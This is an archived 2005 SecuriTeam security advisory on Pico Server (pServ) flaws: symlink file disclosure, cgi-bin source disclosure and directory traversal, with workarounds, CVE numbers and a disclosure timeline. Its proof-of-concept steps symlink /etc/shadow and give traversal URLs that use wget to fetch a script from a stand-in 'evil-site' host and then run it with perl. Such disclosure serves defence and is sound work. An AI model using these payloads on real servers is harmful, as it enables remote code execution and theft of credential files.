[UNIX] Pico Server Multiple Vulnerabilities (Information Disclosure, Directory Traversal)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/17/05

Next message: SecuriTeam: "[EXPL] Mac OS X / Adobe Version Cue Local Root (Exploit)"

Previous message: SecuriTeam: "[UNIX] Linux Kernel pktcdvd and rawdevice ioctl Race Condition"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 May 2005 11:22:00 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Pico Server Multiple Vulnerabilities (Information Disclosure, Directory
Traversal)
------------------------------------------------------------------------

SUMMARY

" <http://pserv.sourceforge.net/> Pico Server (pServ) is written in
portable C (K&R style so it can compile on older compilers too) and sports
several options that by means of #define statements can customize the
behavior, the performance and the feature set so to be able to fit better
the the requisites."

Information Disclosure vulnerabilities where found in Pico server that
allow attackers to retrieve information from the local computer. A
directory traversal vulnerability found in the Pico server allows
attackers to execute arbitrary code.

DETAILS

Vulnerable Systems:
* Pico Server version 3.2 and prior (Vulnerable to all vulnerabilities)
* Pico Server version 3.3 (Vulnerable to local information disclosure)

Immune Systems:
* Pico Server version 3.3 (Immune to remote information disclosure and
directory traversal)

Local Information Disclosure:
pServ does not distinguish between normal files and from symbolic-links.
Unfortunately it only check the link itself but not check if the
symbolic-link target is still in the web-root. That is why an attacker
with access to a directory on the web server (e.g. via FTP) can place a
symbolic link to any file on the server. The attacker can then retrieve
that file (if pServe have the permission to read it) through the web
server by navigating his browser to that link.

Proof of Concept
Retrieving /etc/shadow if pServe runs as root:
1. As user go to your web-directory e.g.: cd /usr/local/var/www/userdir
2. Create a link to /etc/shadow: ln -s /etc/shadow
3. Retrieve the shadow file by pointing your browser to
http://vuln-host:2000/userdir/shadow

Workaround
pServe should run as a user with minimal privileges. Files that should not
be read by unprivileged users should have their permissions set
accordingly.

Remote Information Disclosure:
pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated
as cgi-scripts. The server does not check correctly whether a user
accesses a file in cgi-bin and gives away the source instead of executing
it.

The server only checks, whether a file is in cgi-bin by checking whether
the beginning of the directory part of the URL matches "cgi-bin". A user
can circumvent this by asking for /somedir/../cgi-bin/ and therefore is
able to retrieve the complete source-code of all scripts in cgi-bin.

Proof of Concept:
This URL lets us download the source of test.pl instead of executing it.
http://vuln-host:2000/somedir/../cgi-bin/test.pl

Vendor Status:
The developers have released version 3.3. This version should fix the
problem.

Directory Traversal:
Only if pServ is compiled with support for CGI-BIN a remote attacker is
able to execute any program (with pServ permissions) on the server by
traversing out of the cgi-bin directory.

The CGI-BIN support is searching in the URL for the directory cgi-bin
and if it found, the script are treated as CGI scripts.

To avoid that a user traverses out of the cgi-bin using traditional /../,
pServ parses the requested URL. It increases a counter by one if it parses
a / (new subdirectory) and decreases the counter if it parses /../. If the
counter goes below zero the URL is rejected as illegal. Unfortunately an
attacker can avoid being rejected, just by using enough / in the URL
(without directory names between them), so he can traverse out of the
cgi-bin by adding some /../ . This allow the attacker execute any program
on the server (with pServ permissions).

Proof of Concept:
The following url downloads a script (or executable) to the server:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q +http://evil-site/evil.pl/+-O+/tmp/evil.pl

This is how the script can be executed afterwards:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl

Vendor Status:
The developers have released version 3.3. This version should fix the
problem.

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365>
CAN-2005-1365
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1366>
CAN-2005-1366
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1367>
CAN-2005-1367

Disclosure Timeline:
2005-04-29 Vulnerabilities found
2005-05-02 First attempt to inform developers. CAN-number assigned
2005-05-04 Second attempt to inform developers
2005-05-16 New version released two vulnerabilities was fixed (Remote
Information discloser and Directory Traversal) One Vulnerability was not
fixed (Local Information Discloser). Advisory published

ADDITIONAL INFORMATION

The information has been provided by <mailto:bugtraq@clausrfoverbeck.de>
Claus R. F. Overbeck.
The original article can be found at:
<http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010>
http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010,
<http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-011>
http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-011 and
<http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-012>
http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-012

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[EXPL] Mac OS X / Adobe Version Cue Local Root (Exploit)"

Previous message: SecuriTeam: "[UNIX] Linux Kernel pktcdvd and rawdevice ioctl Race Condition"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: Can CGI script un-virtualize a relative path?
... while cgi-bin is a server wide alias. ... > located in respective home directory, ... Part of my touble is that virtually all discussion of CGI assumes you're ...
(comp.lang.tcl)
Re: BSDstats Project v2.0 ...
... He's trying to prevent any possibility of information disclosure about ... If I wanted to hack into his site, knowing what hosts he ... that sort of data fairly readily. ... the stats server should have a public key and data sent to it ...
(freebsd-questions)
cgiemail on redhat
... I am trying to set up cgiemail on my redhat server, ... the instructions on the website, ... The cgi-bin resides in this place. ...
(alt.linux)
[Full-disclosure] Kiwi CatTools TFTP server path traversal
... server can lead to information disclosure and remote code execution ... Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET ...
(Full-Disclosure)
Re: Uploading to hosting
... Most likely, the cgi-bin has been set up as a sub web on the server, but not ... Make the cgi-bin a subweb on both local and server. ... cgi-bin does not refer to a page or folder ...
(microsoft.public.frontpage.programming)